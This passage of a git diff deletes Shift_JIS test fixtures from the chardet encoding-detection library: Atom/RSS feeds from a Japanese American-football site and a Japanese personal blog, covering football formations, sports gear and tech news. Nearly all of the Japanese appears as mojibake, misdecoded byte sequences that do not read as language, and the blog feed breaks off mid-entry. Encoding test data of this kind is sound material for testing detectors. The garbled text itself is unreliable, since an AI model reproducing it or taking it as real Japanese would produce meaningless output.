    • ƒIƒvƒVƒ‡ƒ“ƒ}ƒ“‚×ATB‚ּ•‚ֹ‚©‚ֱ‚ִ‚¢‚ֱ‚½‚חAQB‚ֽƒ{[ƒ‹‚נ‚ֱ‚½‚‚A‘O‚ֹ‘–‚ט‚‚·B
    • -
    -

    ‚±‚ּ2ם—‚ּ‘I‘נ‚נQB‚׃vƒ[’†‚ֹ”»’f‚µ‚ִAƒIƒvƒVƒ‡ƒ“ƒ}ƒ“‚נ–³—ֽ‰»‚·‚יƒvƒ[‚נ -uƒIƒvƒVƒ‡ƒ“v‚ִֶ‚ׁ‚‚·B

    -

    -

    QBETB‹₪‚ֹװ‚¢–מˆף‚ֹ‚ָ‚ֱ‚ִ‚¢‚‚·‚×A‚±‚ך‚ֽA -‚ַ‚¿‚ח‚אƒ{[ƒ‹‚נ‚ֲ‰ֲ”\«‚ׂ ‚י‚ֶ‚¢‚₪ˆ׃–¡‚ֵ‚·B

    -

    ‚±‚ּ—ב‚ֵ‚ֽAƒIƒvƒVƒ‡ƒ“ƒ}ƒ“‚×1l‚ֵAƒIƒtƒFƒ“ƒX‚ּ‘I‘נˆ‚ֽ2‚ֲ‚ֵ‚·B -

    -

    ‚±‚ך‚ֶ‚ֽ•‚ֹAƒIƒvƒVƒ‡ƒ“ƒ}ƒ“‚×2l‚ֵA -ƒIƒtƒFƒ“ƒX‚ּ‘I‘נˆ‚ֽ3‚ֲ‚ֶ‚¢‚₪ƒvƒ[‚א‰ֲ”\‚ֵ‚·B‚±‚ך‚נA -uƒgƒƒvƒ‹ƒIƒvƒVƒ‡ƒ“v‚ִֶ‚ׁAƒ`[ƒ€‚ֹ‚ז‚ֱ‚ִ‚ֽAuƒIƒvƒVƒ‡ƒ“v‚ֶ¾‚¦‚־uƒgƒƒvƒ‹ƒIƒvƒVƒ‡ƒ“v‚נw‚·ך‡‚א‚ ‚ט‚‚·B -

    -

     

    -

     

    -

    ‚¾‚ס‚¾‚סƒAƒƒtƒg‚ּ‰נא‚ח‚µ‚­‚ָ‚ֱ‚ִ‚«‚‚µ‚½‚ֻB

    -

    ‰ס‚ֽƒ‰ƒ“ƒvƒ[‚ּד•ׂ‚נ‚¨‘—‚ט‚¢‚½‚µ‚‚·‚ּ‚ֵA‚ז‚כ‚µ‚­‚¨ט‚¢‚µ‚‚·B

    ]]> -
    -
    - -ƒ{ƒfƒBƒƒCƒJ[ - -2005-06-18T01:57:59Z -2005-06-18T01:54:14Z -tag:www.amefoot.net,2005://2.1338 -2005-06-18T01:54:14Z - ƒ{ƒfƒBƒƒCƒJ[ ƒWƒ€—pƒEƒFƒCƒgƒgƒ[ƒjƒ“ƒO‹@ם‚ר‚¼‚כ‚¢‚ֵ‚·Bƒo[ƒxƒ‹Eƒ_ƒ“ƒx... - -shusaku - -shusaku_18@ybb.ne.jp - -50)ƒgƒ[ƒjƒ“ƒO—p•i - -

    - -


    -

    -

    - -

    - -

    ƒ{ƒfƒBƒƒCƒJ[
    -

    - -

    - -

    ƒWƒ€—pƒEƒFƒCƒgƒgƒ[ƒjƒ“ƒO‹@ם‚ר‚¼‚כ‚¢‚ֵ‚·Bƒo[ƒxƒ‹Eƒ_ƒ“ƒxƒ‹‚ָ‚ַ‚ֽ‚א‚¿‚כ‚סAƒxƒ‹ƒg‚גƒTƒvƒƒƒ“ƒg‚ָ‚ַ‚ּ¬•¨‚א[ְ‚µ‚ִ‚¢‚‚·B
    -i“¬‹Z—p•i‚ּ‚¨“X‚ֶ‚¢‚₪‚±‚ֶ‚א‚ ‚טA’jL‚³‚׃vƒ“ƒvƒ“‚µ‚‚·B

    - -

    ]]> - -
    -
    - -ƒAƒ“ƒ_[ƒA[ƒ}[ - -2005-06-15T18:45:40Z -2005-06-14T15:34:14Z -tag:www.amefoot.net,2005://2.1335 -2005-06-14T15:34:14Z -ƒAƒ“ƒ_[ƒA[ƒ}[ 2005”N5‚ֹ2”װ–‚ֹ”„‚ך‚½ƒWƒƒƒ“ƒ‹‚ֵ‚·BƒAƒ“ƒ_[ƒA[ƒ}[‚ּ... - -shusaku - -shusaku_18@ybb.ne.jp - -0100)“ֱWƒAƒƒtƒgƒOƒbƒY - -ƒAƒ“ƒ_[ƒA[ƒ}[

    -

    2005”N5‚ֹ2”װ–‚ֹ”„‚ך‚½ƒWƒƒƒ“ƒ‹‚ֵ‚·BƒAƒ“ƒ_[ƒA[ƒ}[‚ּ‘I‚ׁ•‚נ׀‰מ‚µ‚‚·B

    ]]> -”ּ”„”‚ֵ‚ֽ2ˆ‚ֵ‚·‚×A”„ד‚ֵ‚ֽNo.1‚ּƒAƒ“ƒ_[ƒA[ƒ}[‚ֵ‚·B

    -

     

    -

    ‚‚¸AƒAƒ“ƒ_[ƒA[ƒ}[‚ּ•×—‚נ‚²א–¾‚µ‚‚·B

    - - - - - - - -
    - - - - - heatgear(ƒq[ƒgƒMƒA)
    ’‹C«E‘¬£«‚ֹ—D‚ך‚½‘f‚נg—pB ‘ּ‚ֹ‚ׂ‚ֱ‚½‚טƒtƒBƒbƒg‚·‚יƒ^ƒCƒv‚ֵ‚·B - ^‰ִ‚ּ—KA‡‚ֹƒVƒ‡ƒ‹ƒ_[‚ּ‰÷‚ֹ’…‚‚µ‚ו‚₪B -
    - - - - - - - -
    - - - - - loosegear(ƒ‹[ƒYƒMƒA)
    ‚ה‚ֱ‚½‚ט‚µ‚ִy‚¢ƒ^ƒCƒv‚ֵ‚·B ƒEƒH[ƒ~ƒ“ƒOƒAƒbƒv‚גƒgƒ[ƒjƒ“ƒO‚ֹ’…—p‚µ‚‚µ‚ו‚₪B -
    - - - - - - - -
    - - - - - allseasongear(ƒI[ƒ‹ƒV[ƒYƒ“ƒMƒA)
    ­‚µת‚¢¶’n‚נg—p‚µ‚ִ‚¢‚‚·B‘ּ‚ֹƒtƒBƒbƒg‚·‚יƒ^ƒCƒv‚ֵA’·‘³‚א‚ ‚ט‚‚·B - H‚ּƒV[ƒYƒ“I”ױ‚ּ‚¿‚ו‚ֱ‚ֶ¦‚¢‡‚ֹ‚¨‚·‚·‚‚ֵ‚·B - -
    - - - - - - - -
    - - - - - turfgear(ƒ^[ƒtƒMƒA)
    ƒq[ƒgƒMƒA‚ּ’·‘³ƒo[ƒWƒ‡ƒ“‚ֵ‚·B‹‚¢“ת‚ֵ‚א’…‚ח‚ך‚י‚ּ‚ֵA - lHֵ‚ּƒOƒ‰ƒ“ƒh‚ָ‚ַ‚ֵA - C‚ט‚נƒPƒA‚µ‚ִ’…‚י‘Iט‚ב½‚¢‚ז‚₪‚ֵ‚·B -
    -

    ד‹L‚ּ•×—–¼‚ֽy“Vsך ‚ּƒPƒ“ƒR[ƒRƒ€ ‚ֶ‚¢‚₪ƒVƒ‡ƒbƒv‚ֹƒƒ“ƒN‚µ‚ִ‚¢‚‚·B

    -

    y“Vsך ‚ֹ“o˜^‚³‚ך‚ִ‚¢‚י•‚ֽA‚±‚ּƒVƒ‡ƒbƒv‚ֵw“‚³‚ך‚י‚ּ‚×ֵ‚אָ’P‚ֵ‚·B

    -

     

    -

    ‚ֵ‚אA‚¿‚ו‚ֱ‚ֶ‘ׂ‚ֱ‚ִ‚­‚¾‚³‚¢II -

    -

    ƒAƒƒtƒg.net‚ֵ׀‰מ‚³‚¹‚ִ’¸‚¢‚½ƒVƒ‡ƒbƒv‚ֵAˆך”װ”„‚ך‚½‚ּ‚ֽAƒˆְƒXƒ|[ƒcƒpƒ‰ƒ_ƒCƒX ‚ֶ‚¢‚₪ƒVƒ‡ƒbƒv‚ֵ‚·B

    -

    ‚»‚ּ–¼‚ּ’‚טƒˆְ‚ֵAֲ”ְ’ט‚ֶ‚ָ‚ֱ‚ִ‚¢‚י‚½‚A‚‚”„‚ט״‚ךף‘װ‚ֵ‚·‚×A‚‚¾Aƒm[ƒXƒ[ƒu(‘³‚ָ‚µ)ƒ^ƒCƒv‚ֽ—]‚ֱ‚ִ‚¢‚‚·B -(2005/06/15»)

    -

    ‘³‚ָ‚µ‚ׂ¨D‚«‚ָ•‚ֽAƒˆְƒXƒ|[ƒcƒpƒ‰ƒ_ƒCƒX ‚ֵw“‚³‚ך‚½•‚×—ַ‚¢‚ֵ‚µ‚ו‚₪B

    -

    ‚»‚ּך‡‚ֽA‚¿‚ו‚ֱ‚ֶ‹}‚¢‚¾•‚×—ַ‚¢‚©‚א‚µ‚ך‚‚¹‚סB

    -

     

    -

    ‚‚½A•i‘µ‚¦‚×–L•x‚ָ -ƒXƒ|[ƒcƒI[ƒ\ƒƒeƒB‚ֽAy“Vsך‚ֵ‚ֽ‚ ‚ט‚‚¹‚ס‚×AƒˆְƒXƒ|[ƒcƒpƒ‰ƒ_ƒCƒX ‚ֵ”ƒ‚¢‚»‚ׁ‚ך‚ִ‚µ‚‚ֱ‚½•‚×w“‚³‚ך‚ִ‚¢‚י‚ז‚₪‚ֵ‚·B

    -

    ‚±‚±‚ֵ‚ֽAFAƒTƒCƒY‚ֶ‚אA‚²©—R‚ֹ‚¨‘I‚ׁ’¸‚¯‚י‚ּ‚ֵA‚±‚¾‚ם‚ט‚ּ‚ ‚י•‚ֹ‚¨©‚‚ֵ‚·B

    ]]> -
    -
    - -‘ז13‰סFƒAƒƒtƒg‚ּƒtƒH[ƒ[ƒVƒ‡ƒ“(2)ƒfƒBƒtƒFƒ“ƒX - -2005-06-23T07:26:09Z -2005-06-10T16:24:50Z -tag:www.amefoot.net,2005://2.1332 -2005-06-10T16:24:50Z -‘ז13‰סFƒAƒƒtƒg‚ּƒtƒH[ƒ[ƒVƒ‡ƒ“(2)ƒfƒBƒtƒFƒ“ƒX ‘O‰ס‚ֹˆר‚«‘±‚«AƒAƒƒtƒg... - -shusaku - -shusaku_18@ybb.ne.jp - -0200)ƒAƒƒtƒg“–ו - -‘ז13‰סFƒAƒƒtƒg‚ּƒtƒH[ƒ[ƒVƒ‡ƒ“(2)ƒfƒBƒtƒFƒ“ƒX

    -

    ‘O‰ס‚ֹˆר‚«‘±‚«AƒAƒƒtƒg‚ּƒtƒH[ƒ[ƒVƒ‡ƒ“‚נ‚²׀‰מ‚µ‚‚·B¡‰ס‚ֽƒfƒBƒtƒFƒ“ƒX•ׂ‚ֵ‚·B

    ]]> -‚‚¸‚ֽAƒ|ƒWƒVƒ‡ƒ“–¼‚ּ—×ך‚נm”F‚µ‚‚µ‚ו‚₪B

    -
      -
    • DLFƒfƒBƒtƒFƒ“ƒXƒ‰ƒCƒ“
    • -
    • LBFƒ‰ƒCƒ“ƒoƒbƒJ[
    • -
    • CBFƒR[ƒi[ƒoƒbƒN ¦
    • -
    • SSFƒXƒgƒƒ“ƒOƒZ[ƒtƒeƒB ¦
    • -
    • FSFƒtƒ[ƒZ[ƒtƒeƒB ¦
    • -
    -

    ¦CBESSEFS‚נ‚‚ֶ‚‚ִDB(ƒfƒBƒtƒFƒ“ƒVƒuƒoƒbƒN)‚ִֶ‚װ

    -

    EEE‚ֵ‚µ‚½‚ֻBeƒ|ƒWƒVƒ‡ƒ“‚ּ–נ„‚ֹ‚ֲ‚¢‚ִ‚ֽA‘ז11‰ס‚נ‚²——‚­‚¾‚³‚¢B

    -

     

    -

    ƒfƒBƒtƒFƒ“ƒX‚ּƒtƒH[ƒ[ƒVƒ‡ƒ“(‘ּ^)‚אA׳‚©‚­”‚¦‚ך‚־A -uְ‚ט‚ָ‚­v‚ֶ¾‚ֱ‚ִ—ַ‚¢‚‚ַ‚ ‚ט‚‚·B

    -

    ‚±‚±‚ֵ‚ֽA‚ז‚­©‚י‘ד•\“I‚ָƒtƒH[ƒ[ƒVƒ‡ƒ“‚נ‚²׀‰מ‚µ‚‚·B

    -

     

    -

    13-1. ‚S|‚R‘ּ^

    - - - - - - - -
    -

    -
    -

    “ת–{‚ֵ‚ֵֽ‚א‚ז‚­—p‚¢‚ח‚ך‚יƒtƒH[ƒ[ƒVƒ‡ƒ“‚ֵ‚·B

    -

     

    -

    DL‚×4lALB‚×3l‚¢‚י‚±‚ֶ‚©‚חA4-3‘ּ^‚ִֶ‚־‚ך‚ִ‚¢‚‚·B

    -

    LB‚×DL‚ז‚ט‚אL‚ֱׂ‚ִ‚¢‚יu4-3ƒvƒ‘ּ^v - (¶})‚ֶADL‚ּ•‚×L‚ֱׂ‚ִ‚¢‚יu4-3ƒJƒƒbƒW‘ּ^v - ‚ׂ ‚ט‚‚·B

    -

     

    -

    DB‚ֽ4l‚ֵASS‚ֽƒXƒgƒƒ“ƒOƒTƒCƒh(ƒ^ƒCƒgƒGƒ“ƒh‚ּ‚¢‚יƒTƒCƒh)‚ֹס‚ֱ‚ִ‚¢‚י‚ּ‚׈ך”“I‚ֵ‚·B

    -

    ‚½‚¾‚µAƒIƒtƒFƒ“ƒX‚×¶‰E‹ֿ“™‚ּך‡‚ֽAƒfƒBƒtƒFƒ“ƒX‚א‹ֿ“™‚ֹƒZƒbƒg‚·‚י‚ּ‚ו’‚ֵ‚·B

    -
    -

     

    -

    13-2. ‚S|‚S‘ּ^

    -

     

    - - - - - - - -
    -

    -
    -

    DLALB‚×4l‚¸‚ֲ‚ּ4-4‘ּ^‚ֽADB‚×3l‚µ‚©‚¢‚ָ‚¢‚ּ‚ֵAƒ‰ƒ“ƒvƒ[‚ֹ‘־‚·‚יח‚ט‚נd‹‚µ‚½‘ּ^‚ֵ‚·B -

    -

    ‚‚¶‰E‹ֿ“™‚ֶ‚ָ‚י‚ּ‚ֵAƒXƒgƒƒ“ƒOƒTƒCƒh‚ּU‚‚ֹד‚¢X‚ׂ ‚ט‚‚·B

    -

    ƒpƒXƒvƒ[‚ֹ‘־‚µ‚ִ_“מ‚ֹ‘־‰‚ֵ‚«‚ָ‚¢‚½‚A‚·‚׳‚ִ‚ּף‹µ‚ֵg‚¦‚י‘ּ^‚ֵ‚ֽ‚ ‚ט‚‚¹‚סB

    -

     

    -

    ¡‚ֽA‚ ‚‚טƒƒWƒƒ[‚ֶ‚ֽ¾‚¦‚ָ‚¢‘ּ^‚ֵ‚·B

    -
    -

     

    -

     

    -

    13-3. ‚T|‚Q‘ּ^

    -

     

    - - - - - - - -
    -

    -
    -

    DL5lALB‚×2l‚ּ5-2‘ּ^‚ֵ‚·B

    -

    DB‚ֽ4l‚¢‚‚·‚×A4-3‘ּ^‚ֹ”ה‚׳‚י‚ֶAƒ‰ƒ“ƒvƒ[d‹‚ֶ¾‚¦‚‚·B

    -

    ƒNƒH[ƒ^[ƒoƒbƒN‚ײ‚ּƒ‰ƒbƒVƒ…(P‚¢‚©‚©‚י‚±‚ֶ)‚׋­—ֽ‚ֹ‚ָ‚י”½–AƒTƒCƒhU‚‚ֹד‚¢‚ֶ‚¢‚₪“ֱ’¥‚ׂ ‚ט‚‚·B -

    -

    ‚»‚ּ‚½‚ADB‚ּƒ‰ƒ“ƒvƒ[‚ֹ‘־‚·‚י•‰’S‚בו‚«‚­‚ָ‚י‚±‚ֶ‚ׂ ‚ט‚‚·B

    -
    -

     

    -

     

    -

    13-4. ‚R|‚S‘ּ^

    -

     

    - - - - - - - -
    -

    -
    -

    DL3lALB4l‚ֵADB‚א4l‚¢‚‚·B

    -

    ‚±‚¿‚ח‚ֽAƒpƒXƒvƒ[‚ּח”ץ‚נ—Dז‚µ‚½‘ּ^‚ֵAƒpƒXƒvƒ[’†S‚ּNFL‚ֵ‚ֽ‚ז‚­©‚©‚¯‚‚·B

    -

     

    -

    ƒTƒCƒhU‚‚ֹ‚א‹­‚¢”½–A’†‰›‚ּU‚‚ֹ‚ֽד‚­‚ָ‚ט‚‚·B

    -

    ‚»‚ּ‚½‚Aƒ`[ƒ€‚ֹ‚ז‚ֱ‚ִ‚ֽAƒpƒX‚ּ—\‘z‚³‚ך‚י‚ֶ‚«‚ְֹ‚ֱ‚ִg‚₪ך‡‚א‚ ‚ט‚‚·B

    -
    -

     

    -

     

    -

    13-5. ‚U|‚Q‘ּ^(ƒS[ƒ‹ƒ‰ƒCƒ“‘ּ^)

    -

     

    - - - - - - - -
    -

    -
    -

    DL‚×6l‚ֶ‚¢‚₪‚±‚ּ‘ּ^‚ֽA•’‚ֽƒS[ƒ‹‘O‚ּc‚ט”ƒ„[ƒh‚נ€ח‚·‚יך‡‚ְֹ‚ֱ‚ִ—p‚¢‚ח‚ך‚‚·B

    -

    ‚»‚ּ‚½‚AuƒS[ƒ‹ƒ‰ƒCƒ“‘ּ^v‚ֶ‚אִ‚־‚ך‚‚·B

    -

    ƒS[ƒ‹‘O‚‚ֵU‚‚‚ך‚½ף‹µ‚ֵ‚ֽAƒƒ“ƒOƒpƒX‚ׂ ‚ט“¾‚ָ‚¢‚½‚A‘O—ס‚ֹl”‚נW’†‚ֵ‚«‚י‚ּ‚ֵ‚·B

    -

     

    -

    ˆך”“I‚ֹƒAƒƒtƒg‚ֵ‚ֽA - ©w(ƒfƒBƒtƒFƒ“ƒX‘₪‚ּw’n)‚ּƒGƒ“ƒhƒ][ƒ“‚׋‚­‚ָ‚י‚ֹ‚ֲ‚ך‚ִƒfƒBƒtƒFƒ“ƒX‚×—L—˜‚ֹ‚ָ‚ט‚‚·B

    -

    ח‚י”ֽˆֽ‚׋·‚¢‚©‚ח‚ֵ‚·B

    -
    -

     

    -

     

    -

    ˆָדAƒfƒBƒtƒFƒ“ƒX‚ֹ‚אAƒIƒtƒFƒ“ƒX“¯—lA—lX‚ָƒtƒH[ƒ[ƒVƒ‡ƒ“‚ׂ ‚י‚±‚ֶ‚נ‚¨•ׂ©‚ט‚¢‚½‚¾‚¯‚½‚ֶv‚¢‚‚·B

    -

    ‘¼‚ֹ‚אADB‚×5lˆָד‚ֹ‚ָ‚י‘ּ^‚ָ‚ַ‚א‚ ‚ט‚‚·‚×Aד‹L‚ּ5‚ֲ‚×A‚ז‚­©‚©‚¯‚יƒtƒH[ƒ[ƒVƒ‡ƒ“‚ֵ‚·B

    -

     

    -

    ‰ס‚ֽA‘ד•\“I‚ָƒIƒtƒFƒ“ƒX‚ּƒvƒ[‚נ‚²׀‰מ‚¢‚½‚µ‚‚·B

    -

     

    -

    ‚¨‚·‚·‚ƒAƒƒtƒg“–ו‘ֻu‚·‚®‚ם‚©‚יƒAƒƒƒJƒ“ƒtƒbƒgƒ{[ƒ‹\ -ƒ‹[ƒ‹‚ֶ‡v

    ]]> -
    -
    - -ƒAƒCƒV[ƒ‹ƒh21 Vo.1 - -2005-06-08T15:22:49Z -2005-06-08T15:07:04Z -tag:www.amefoot.net,2005://2.1325 -2005-06-08T15:07:04Z -ƒAƒCƒV[ƒ‹ƒh21 Vo.1posted with amazlet at 05.0... - -shusaku - -shusaku_18@ybb.ne.jp - -90)‚»‚ּ‘¼‚ּDVD•ƒrƒfƒI - -
    ƒAƒCƒV[ƒ‹ƒh21 Vo.1
    ƒAƒCƒV[ƒ‹ƒh21 Vo.1
    posted with amazlet at 05.06.09
    ƒoƒ“ƒ_ƒCƒrƒWƒ…ƒAƒ‹ (2005/07/22)
    ”„‚טד‚°ƒ‰ƒ“ƒLƒ“ƒO: 1,928
    ‹“ת”­”„@—\–ס‰ֲ
    ‚¨‚·‚·‚“x‚ּ•½‹ֿ: 5
    5 ‚ֽ‚‚ט‚‚µ‚½
    5 –{“–‚ֹ‘‚¢EEE‰©‹א‚ּ‹r
    -2005/7/22”­”„II—\–סף•t’†II]]> - -
    -
    - -uƒEƒBƒbƒVƒ…ƒ{[ƒ“ƒtƒH[ƒ[ƒVƒ‡ƒ“v‚ּ—R—ˆ - -2005-06-17T18:58:32Z -2005-06-06T16:16:51Z -tag:www.amefoot.net,2005://2.1321 -2005-06-06T16:16:51Z -uƒEƒBƒbƒVƒ…ƒ{[ƒ“ƒtƒH[ƒ[ƒVƒ‡ƒ“v‚ּ—R—ˆ ƒAƒƒtƒg“–ו‘ז12‰ס‚ֹ‚¨‚¢‚ִA כ‚ֱ... - -shusaku - -shusaku_18@ybb.ne.jp - -9100)ƒAƒƒtƒg.net‚©‚ח‚ּ‚¨’m‚ח‚¹ - -uƒEƒBƒbƒVƒ…ƒ{[ƒ“ƒtƒH[ƒ[ƒVƒ‡ƒ“v‚ּ—R—ˆ

    -

    ƒAƒƒtƒg“–ו‘ז12‰ס‚ֹ‚¨‚¢‚ִA -כ‚ֱ‚½‹Lq‚ׂ ‚ט‚‚µ‚½B‚¨˜l‚ׁ‚¢‚½‚µ‚‚·B

    ]]> -‹L–ל¬“_‚ֵAuƒEƒBƒbƒVƒ…ƒ{[ƒ“v‚נu‹›‚ּ‚µ‚ֱ‚‚ּv‚ֶ‹L‚µ‚ִ‚¢‚‚µ‚½‚×Aכ‚ט‚ֵ‚µ‚½B

    -

    “ַׂ‚ּ•‚©‚ח‚²w“E‚נ’¸‚¢‚ִA’²‚׳‚½‚ּ‚ֵ‚·‚×Awishbone‚ֶ‚ֽA«‘‚ֹ‚ז‚ך‚־A

    -
      -
    1. k’¹l’¨v(‚¿‚ו‚₪‚µ)C³(‚³‚±‚ֲ)is‰ptmerrythoughtjF - ‹¹‚ּ‘O‚ּ“ס‚‚½‚ּ.H–‚ּ‚ֶ‚«M‚ֹc‚ֱ‚½‚±‚ּ‚ּ—¼’[‚נ2l‚ֵˆר‚«‡‚ֱ‚ִ’·‚¢•‚נז‚י‚ֶט‚¢‚²‚ֶ‚ׂ©‚ָ‚₪‚ֶ‚¢‚₪.
    2. -
    3. ³ף‚ּ•¨i“d’‚ּ˜r–״‚ָ‚ַj.
    4. -
    5. kƒAƒƒtƒglƒEƒBƒbƒVƒ…ƒ{[ƒ“ƒtƒH[ƒ[ƒVƒ‡ƒ“FU‚ƒtƒH[ƒ[ƒVƒ‡ƒ“‚ּˆך‚ֲG - ƒoƒbƒN‚×¶‰E‚ֹ—£‚ך‚ִˆ’u‚·‚י
    6. -
    -

    ‚ֶA‚־‚ֱ‚¿‚טo‚ִ‚¢‚‚µ‚½B -

    -

    ‹L–‚ֽC³ֿ‚‚ֵ‚·B

    -

     

    -

    ף±‚נT‚¦‚½‚Z¶‚ּ•‚א‚²——‚ֹ‚ָ‚ֱ‚ִ‚¢‚י‚ֶv‚ם‚ך‚‚·B(‚ ‚ ‚ EEE‚ַ‚₪‚µ‚ז‚₪EEE)

    -

    ‘ו•ֿ‚²–ְ˜f‚נ‚¨‚©‚¯‚µ‚‚µ‚½`II -

    ]]> -
    -
    - -
    \ No newline at end of file diff --git a/chardet/tests/SHIFT_JIS/andore.com.inami.xml b/chardet/tests/SHIFT_JIS/andore.com.inami.xml deleted file mode 100644 index 96ff500..0000000 --- a/chardet/tests/SHIFT_JIS/andore.com.inami.xml +++ /dev/null @@ -1,181 +0,0 @@ - - - - - -ƒAƒƒƒJ‚ֵ‚ׂס‚־‚ט‚‚µ‚ו‚₪ -http://andore.com/inami/ - -ja - -2006-01-02T19:30:00-08:00 - - - - - - - - - - - - - - - - - - - - - - - - - -Google PC ‚×”­”„‚³‚ך‚י? -http://andore.com/inami/mtarchives/003416.html -digg.com o—RB -ƒIƒ‚אƒCƒ}ƒCƒ`M‚¶‚ח‚ך‚ָ‚¢‚×AGoogle ‚׋“ת’†‚ֹ 200-300ƒhƒ‹(2–2000‰~ - 3–5000‰~)’צ“x‚ּ PC ‚נ”­”„‚·‚י‚ּ‚ֵ‚ֽ‚ָ‚¢‚©‚ֶ‚¢‚₪‰\‚×—¬‚ך‚½B -03 ƒRƒ“ƒsƒ…[ƒ^ -Hiro -2006-01-02T19:30:00-08:00 - - -2006”N‚א‚ׂס‚־‚ט‚‚µ‚ו‚₪ -http://andore.com/inami/mtarchives/003415.html -‚ [A‚א‚₪¡”N‚א‚ ‚ֶ­‚µB -‚ֶ‚¢‚₪‚ּ‚ֹAƒTƒ“ƒtƒ‰ƒ“ƒVƒXƒR ƒxƒCƒGƒƒA(–kƒJƒƒtƒHƒ‹ƒjƒA)‚ֽ—’‚ֹ©•‘‚ם‚ך‚ִ‚·‚²‚¢‚±‚ֶ‚ֹB ƒƒCƒ“‚ֵ—L–¼‚ָ Napa ‚ֵ‚ֽ‘ו‰J‚ֵ^…‚×”­¶‚µAƒEƒ`‚ּZ‚ס‚ֵ‚¢‚י‚ֶ‚±‚כ‚ֵ‚ֽ‚¨’‹‚²‚כ‚©‚ח‚³‚ֱ‚«‚‚ֵƒP[ƒuƒ‹ƒeƒƒr‚ּƒ‰ƒCƒ“‚ֹבQ‚×”­¶‚µAƒeƒƒr‚אƒCƒ“ƒ^[ƒlƒbƒg‚א•s’‚ֹB װ‚ֵ‹‚נ‘–‚ֱ‚½‚ֶ‚«‚ֹx@‚ד¹˜H‚ו•½‚µ‚ִA‚ָ‚ֹ‚©ל‹ֶ‚נ‚µ‚ִ‚¢‚½‚ּ‚ׂם‚©‚ֱ‚½‚ּ‚ֵ‹­•—‚ֵ–״‚ֵ‚א“|‚ך‚½‚ז‚₪‚ָ‚ז‚₪‚¾B -01 ©ָ׀‰מEƒTƒCƒg׀‰מ -Hiro -2005-12-31T23:55:00-08:00 - - -‚¢‚¢ DVD+-R ƒƒfƒBƒA‚ֽ‚ַ‚ך? -http://andore.com/inami/mtarchives/003411.html -DVDƒƒR[ƒ_[‚נg‚ֱ‚ִ‚‚י‚ֶ‹C•t‚­‚ּ‚×Ag‚₪ƒƒfƒBƒA‚ֹ‚ז‚יִ‚¯‹ן‡B —L–¼ƒuƒ‰ƒ“ƒh‚ּƒƒfƒBƒA‚ֽ–ג‘ט‚ָ‚­ִ‚¯‚י‚×A‚¢‚ם‚ה‚יƒm[ƒuƒ‰ƒ“ƒh‚ֶ¾‚ם‚ך‚יƒƒfƒBƒA‚¾‚ֶ¸”s‚·‚י‚±‚ֶ‚א‘½‚¢B CD-R ‚ּ‚ֶ‚«‚א“¯‚¶‚ז‚₪‚ָ‚±‚ֶ‚×¾‚ם‚ך‚½‚×ADVD-R‚ּך‡‚ֽ‚»‚ךˆָד‚ֹAƒuƒ‰ƒ“ƒh‚ֹ‚ז‚י·‚׃‚µ‚¢‚ז‚₪‚ָ‹C‚ׂ·‚יB ‚¯‚ַA‚ֵ‚«‚י‚¾‚¯ˆְ‚­‚µ‚½‚¢‚ֶ‚¢‚₪‹C‚¿‚א‚ ‚ֱ‚½‚ט‚µ‚ִ”Y‚‚µ‚¢‚ֶ‚±‚כ‚¾B -03 ƒRƒ“ƒsƒ…[ƒ^ -Hiro -2005-12-27T08:00:00-08:00 - - -Lightning Pool (ƒrƒƒ„[ƒhƒQ[ƒ€) ‚ֹƒnƒ}‚י -http://andore.com/inami/mtarchives/003407.html -”“ת‘O‚ֹAד‚ּƒGƒ“ƒgƒ‚נ Digg ‚ֵ”­©B -Pool Game ‚ֶ‚¢‚₪‚ּ‚ֽƒrƒƒ„[ƒh‚ּ‚±‚ֶB (Pool Bar ‚ּ Pool)B ‚ֵ‚µ‚ֹ‚ג‚ֱ‚ִ‚‚½‚חAƒnƒ}‚יƒnƒ}‚יB -02 ƒAƒƒƒJ¶ˆ -Hiro -2005-12-23T08:00:00-08:00 - - -VistaXP ‚×צJ’†~‚ֹ -http://andore.com/inami/mtarchives/003405.html -5ƒ–‚‚ַ‘O‚ֹצJ‚µ‚ִA‚±‚ּƒTƒCƒg‚ֵ‚א׀‰מ‚µ‚½ VistaXP ‚ֶ‚¢‚₪ƒe[ƒ}ƒtƒ@ƒCƒ‹B ƒ}ƒCƒNƒƒ\ƒtƒg‚ּתOS ‚ֵ‚ ‚י Windows Vista ‚ֶ—‚½‚ז‚₪‚ָ©‚½–‚נ XP ‚ֵ‚אִ»‚·‚י‚ֶ‚¢‚₪‚±‚ּƒe[ƒ}ƒtƒ@ƒCƒ‹‚¾‚ֱ‚½‚ּ‚¾‚×AMicrosoft ‚©‚חם—v¿‚ׂ ‚ֱ‚½‚½‚AצJE”z•z’†~‚ֶ‚ָ‚ֱ‚ִ‚µ‚‚ֱ‚½B -03 ƒRƒ“ƒsƒ…[ƒ^ -Hiro -2005-12-22T08:00:00-08:00 - - -ƒTƒbƒJ[“ת–{‘ד•\ם‚ּƒ`ƒPƒbƒg‚ֽ20“ת(‰־)”­”„ -http://andore.com/inami/mtarchives/003401.html -—ˆ”N‚ּ210“תAƒTƒ“ƒtƒ‰ƒ“ƒVƒXƒR‚ֵƒTƒbƒJ[“ת–{‘ד•\‚׃AƒƒƒJ‘ד•\‚ֶ‡‚נ‚·‚י‚ֶ‚¢‚₪’¿‚µ‚¢ƒCƒxƒ“ƒg‚×s‚ם‚ך‚יB ‚»‚ּƒ`ƒPƒbƒg‚ּ”ּ”„‚׃Tƒ“ƒtƒ‰ƒ“ƒVƒXƒR‚ּװ‘ׁ (PST) ‚ֵ 12/20(‰־) 10:00am ‚ֹJn‚³‚ך‚יB -02 ƒAƒƒƒJ¶ˆ -Hiro -2005-12-18T13:00:00-08:00 - - -ƒAƒƒƒJ”ֵ VICS? -http://andore.com/inami/mtarchives/003392.html -“ת–{‚ֵ‚ֽƒJ[ƒiƒr‚ּ‹@”\‚ֶ‚µ‚ִˆך”“I‚ֹ‚ָ‚ֱ‚½VICS (“¹˜Hנ’מ•סƒVƒXƒeƒ€A‚¢‚ם‚ה‚יa‘״מ•ס)B -ƒAƒƒƒJ‚ֵ‚ֽ‚‚¾ƒJ[ƒiƒr‚×­‚µ‚ֳ‚ֲ•‹y‚µ‚ִ‚«‚ִ‚¢‚י‚ז‚₪‚ָף‘װ‚ָ‚ּ‚ֵA‚‚¾‚»‚₪‚¢‚ֱ‚½ƒVƒXƒeƒ€‚ֽ‚ָ‚¢B 